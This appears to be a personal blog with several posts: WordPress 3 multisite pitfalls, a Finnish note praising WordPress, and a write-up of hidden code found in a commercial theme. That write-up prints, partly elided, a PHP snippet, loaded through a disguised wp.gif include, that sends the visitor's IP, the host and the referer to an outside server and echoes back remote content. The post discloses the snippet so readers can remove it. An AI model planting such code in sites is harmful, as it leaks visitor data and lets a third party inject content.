I was loking forward to see wp3 multisite system. Unfortunately I hoped to get one backend administration site for many blogs where I could mix content between blogs. Multisite support is not for that purpose. It just ables many completely separate blogs to use with single wp installation. So I could as well copy my blog folder and database to get the same outcome.
If you are still going to enable wp3 multisite feature, read the installation instructions vary carefully cause the installation settings are not reversible. Pay attention whether you select sub-domains or sub-directories installation. I didn’t and I end up messing the installation. Cause of that problem my blog was under some sort of attack or at least target of spam. I wouldn’t have notice that if my sites monthly bandwidth transfer hasn’t rice like stockbroker’s dream.
Multisite feature installation mess my blog and able some hackers to misuse of it.
Luckily I had backup 
Warning: URL file-access is disabled in the server configuration
After installing one of the HireWordPressExperts.com theme, I got warning on my frontpage that it’s not safe to load scripts file_get_contents() from http://24365online.com/_YTG_yu/_dl/get_info.php?…
Warning directed me to look script from general-template.php file and I found suspicious script:
/*** HWEDLC ***/
…
$url = “http://24365online.com/_YTG_yu/_dl/get_info.php?host=$host&referer=$referer&visitor_ip=$visitor_ip”;
$content = file_get_contents($url);
echo $content;
After removing the script and refresing browser warning was gone, but second refresh brought back the same warning
I was sure this warning is caused some of the new theme files, so I tried to search similar content from inside of these files. Unfortonately Windows isn’t indexing php files, but lucily Visual Studio was able to find file. Surprisingly string was found from image file wp.gif. Soon I discovered that functions.php file tried to include wp.gif file into source code. Wp.gif file was adding additional code into get_footer function.
In the end solution was quite simple:
- Remove wp.gif file
- Remove include or require command from functions.php
- Clean the get_footer function from wp-includes/general-template.php file
I’m still believe in that the script is just a advertice, but HireWordPressExperts.com could do example XSS vulnerability into your service or mess up the layout.
Would you hire “experts” that are using this kind of marketing strategies?
Olen kerennyt käyttäää WordPress julkaisujärjestelmää vasta 3-4 tuntia, ilman minkäänlaista aiempaa kokemusta ja vieläkin olen erittäin tyytyväinen järjestelmään. Käytettävyys on hiottu järjestelmässä aivan huippuunsa enkä ole törmännyt vielä minkäänlaisiin ongelmiin.
Täytyy sanoa että tästä järjestelmästä on monilla oppimista ainakin käytettävyyden osalta.
Pitänee tässä joku päivä vielä vilkaista konepellin alle ja palata asiaan miltä järjestelmä näyttää sieltä käsin.